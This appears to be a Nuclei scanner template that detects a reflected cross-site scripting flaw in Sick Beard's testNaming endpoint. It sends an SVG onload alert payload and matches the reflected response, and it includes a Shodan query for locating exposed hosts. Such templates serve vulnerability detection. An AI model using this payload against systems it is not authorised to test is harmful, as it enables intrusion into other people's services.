nuclei-templates/vulnerabilities/other/sick-beard-xss.yaml

30 lines
692 B
YAML

id: sick-beard-xss
info:
name: Sick Beard Cross-Site Scripting
author: pikpikcu
severity: medium
reference:
- https://sickbeard.com/ # vendor homepage
- https://github.com/midgetspy/Sick-Beard # software link
metadata:
shodan-query: sickbeard
tags: xss
requests:
- method: GET
path:
- "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <svg/onload=alert(document.domain)>
part: body
- type: word
words:
- "text/html"
part: header